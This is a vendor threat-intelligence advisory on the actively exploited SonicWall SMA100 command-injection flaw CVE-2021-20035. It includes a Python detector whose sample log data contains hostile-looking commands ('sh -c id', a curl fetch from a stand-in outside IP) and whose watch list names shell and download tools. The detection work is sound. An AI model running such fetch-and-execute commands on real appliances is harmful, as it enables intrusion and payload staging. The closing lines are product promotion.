By Lyrie Threat Intelligence·4/16/2025

What happened

CISA added CVE-2021-20035 to the Known Exploited Vulnerabilities (KEV) catalog on 2025-04-16, signaling confirmed in-the-wild exploitation of this flaw [CISA KEV]. The vulnerability is an OS command injection in SonicWall SMA100 appliance management, enabling arbitrary command execution by a remote authenticated attacker [NVD entry]. CISA’s listing specifies that injected commands execute under the non-privileged 'nobody' account and sets a federal remediation due date of 2025-05-07 [CISA KEV]. The weakness is categorized as CWE-78 (OS Command Injection), the class of flaw in which user input reaches a system shell and yields arbitrary command execution [NVD CWE-78].

CISA instructs impacted organizations to apply mitigations per vendor guidance, follow applicable BOD 22-01 directives for cloud services, or discontinue use of the product if no mitigations exist [CISA KEV]. The CVE record is tracked across authoritative registries for cross-verification and SBOM mapping [MITRE CVE record].

Why it matters

Inclusion in KEV means active exploitation has been observed against real targets, elevating this issue from theoretical to operational risk [CISA KEV]. Management-plane command injection grants post-auth code execution on a security appliance, shortening the defender’s window and complicating detection when attackers blend into legitimate admin flows [NVD entry]. Even when commands run as 'nobody', attackers can still stage payloads, alter configuration reachable from that user context, or establish footholds, consistent with the impact of OS command injection generally [CISA KEV]. CWE-78 class issues are high-signal because they enable direct OS-level actions rather than data-only impacts [NVD CWE-78].

For organizations with these appliances in critical paths, the KEV due date is not advisory: it is a mandated prioritization target for federal civilian agencies and a de facto urgency marker for everyone else [CISA KEV]. The authentication precondition does not materially reduce risk where credentials are compromised or internal admin access is exposed [NVD entry].

Technical detail

CVE-2021-20035 is an OS command injection vulnerability in the SMA100 management interface, allowing a remote authenticated attacker to inject arbitrary OS commands [NVD entry]. The injected commands execute as the 'nobody' user, a restricted but still operational UNIX account [CISA KEV]. The flaw maps to CWE-78, in which insufficient neutralization of special elements in a command string leads to shell invocation with attacker-controlled input [NVD CWE-78].

The exploitation sequence is straightforward for anyone holding a valid administrative session: authenticate to the management plane, supply crafted input that reaches a command execution sink, and run system-level instructions within the appliance’s OS [NVD entry]. While the privilege is limited to 'nobody', arbitrary command execution remains a reliable way to drop tooling or proxy traffic, as is typical of post-auth code execution [CISA KEV]. KEV inclusion establishes that adversaries have operationalized this path, which materially raises prioritization for affected environments [CISA KEV].

Authoritative records for this CVE are maintained by NVD and MITRE for consistent identification and coordination across tooling, advisories, and asset inventories [NVD entry, MITRE CVE record].

Defense

  • Patch/mitigate now: CISA’s required action is to apply vendor mitigations, follow BOD 22-01 where applicable, or discontinue use if mitigations are unavailable [CISA KEV].
  • Treat the KEV due date (2025-05-07) as a hard prioritization target to reduce exposure while exploitation is active [CISA KEV].
  • Confirm exposure and track remediation using the canonical CVE record across inventories and scanners referencing CVE-2021-20035 and CWE-78 [NVD entry, MITRE CVE record].

Given the post-auth nature of this issue, organizations should presume that credential theft or misuse is a viable pathway whenever exploitation is seen in the wild [CISA KEV]. Prioritize rapid mitigation over lengthy forensics while devices remain exposed [NVD entry].

Lyrie Verdict

CVE-2021-20035 is a management-plane, post-auth OS command injection with confirmed exploitation, making human-in-the-loop response too slow for early containment [CISA KEV]. Lyrie’s position is simple: detect and interdict command-execution patterns at machine speed the moment the management interface begins spawning OS processes, especially under the 'nobody' account context tied to this CVE [NVD entry, CISA KEV]. Autonomous correlation between authenticated admin sessions and emergent process activity is the decisive edge against both human operators and AI-augmented intrusion tooling that can iterate payloads faster than analysts can pivot [MITRE CVE record].
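The session-to-process correlation described above, written out as an added example (not Lyrie's product logic and not SonicWall code). The event layout, the management process name httpd, the 15-minute session window, the shell/tool list and every sample line are constructed assumptions, not the appliance's real log schema.

```python
import re
from datetime import datetime, timedelta, timezone

# Constructed sample events in an assumed "<ts> <kind> key=value ..." layout.
SAMPLE_EVENTS = """\
2025-04-16T10:00:01Z session user=admin src=198.51.100.7 sid=s1 action=login
2025-04-16T10:00:09Z process user=nobody parent=httpd exe=/bin/sh args="sh -c id"
2025-04-16T10:00:10Z process user=nobody parent=httpd exe=/usr/bin/curl args="curl http://203.0.113.5/t"
2025-04-16T10:01:00Z process user=nobody parent=httpd exe=/usr/bin/convert args="convert a.png b.png"
2025-04-16T11:00:00Z process user=root parent=cron exe=/bin/sh args="sh -c logrotate"
2025-04-16T13:00:00Z process user=nobody parent=httpd exe=/bin/sh args="sh -c id"
"""

MGMT_PARENTS = {"httpd"}  # assumed name of the management web process
SHELLS_AND_TOOLS = {"/bin/sh", "/bin/bash", "/usr/bin/curl", "/usr/bin/wget"}
WINDOW = timedelta(minutes=15)  # assumed lifetime of an admin session after login
KV = re.compile(r'(\w+)=("[^"]*"|\S+)')

def parse(line):
    """Split one event into a dict of fields plus a tz-aware timestamp."""
    ts, kind, rest = line.split(" ", 2)
    ev = {k: v.strip('"') for k, v in KV.findall(rest)}
    ev["ts"] = datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
    ev["kind"] = kind
    return ev

def correlate(text):
    """Alert on shell or download-tool spawns as 'nobody' under the management
    process: 'high' when an admin login preceded the spawn within WINDOW,
    'medium' when no login in the window explains it."""
    logins, alerts = [], []
    for raw in text.splitlines():
        ev = parse(raw)
        if ev["kind"] == "session" and ev.get("action") == "login":
            logins.append(ev)
        elif (ev["kind"] == "process" and ev.get("user") == "nobody"
              and ev.get("parent") in MGMT_PARENTS
              and ev.get("exe") in SHELLS_AND_TOOLS):
            linked = [s["sid"] for s in logins
                      if timedelta(0) <= ev["ts"] - s["ts"] <= WINDOW]
            alerts.append({"ts": ev["ts"].isoformat(), "exe": ev["exe"],
                           "args": ev.get("args", ""),
                           "severity": "high" if linked else "medium",
                           "sessions": linked})
    return alerts

if __name__ == "__main__":
    for alert in correlate(SAMPLE_EVENTS):
        print(alert)
```

On the sample, the two spawns seconds after the admin login are tied to session s1, the image-conversion helper and the cron job are ignored, and the shell spawned hours later with no login in the window is flagged on its own.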

Post-auth OS command injection on a management plane demands autonomous controls. Lyrie detects process spawns tied to admin sessions and blocks 'nobody'-context execution at machine speed the moment CVE-2021-20035 paths are exercised.